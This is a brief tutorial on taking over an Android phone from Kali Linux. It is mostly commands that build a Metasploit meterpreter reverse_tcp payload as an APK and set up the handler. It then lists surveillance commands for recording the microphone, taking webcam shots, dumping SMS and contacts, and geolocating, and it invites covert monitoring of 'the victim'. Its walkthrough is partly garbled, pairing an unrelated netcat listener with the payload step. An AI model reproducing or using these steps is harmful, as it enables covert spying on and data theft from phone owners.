gain access to Android via Kali Linux

Principle of operation:
In simple words, first we create an application (payload), in the end we will have a meterpreter session. All operations are performed using utilities based on the Kali Linux operating system.
The principle of operation is easiest to understand by the example of two terminal windows. Imagine that it is a victim and a hacker. The latter runs a command in the terminal:
nc -l -p 8577
The victim in turn connects to this open port:
msfvenom -p android / meterpreter / reverse_tcp LHOST = * LPORT = 4444 R> shell.apk
After the command is executed, the shell.apk file will be created in the root directory.
Next, you need to start msfconsole.
msfconsole
After that, we execute all the commands sequentially:
use exploit / multi / handler
set payload android / meterpreter / reverse_tcp
set LHOST yourIP
set LPORT 4444
exploit
Victim must run shell.apk
Some useful commands:
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate
After establishing a session on the phone, no action occurs. You can safely monitor the victim remotely if she has an active Internet connection.

Commentaires

You are welcome to share your ideas with us in comments!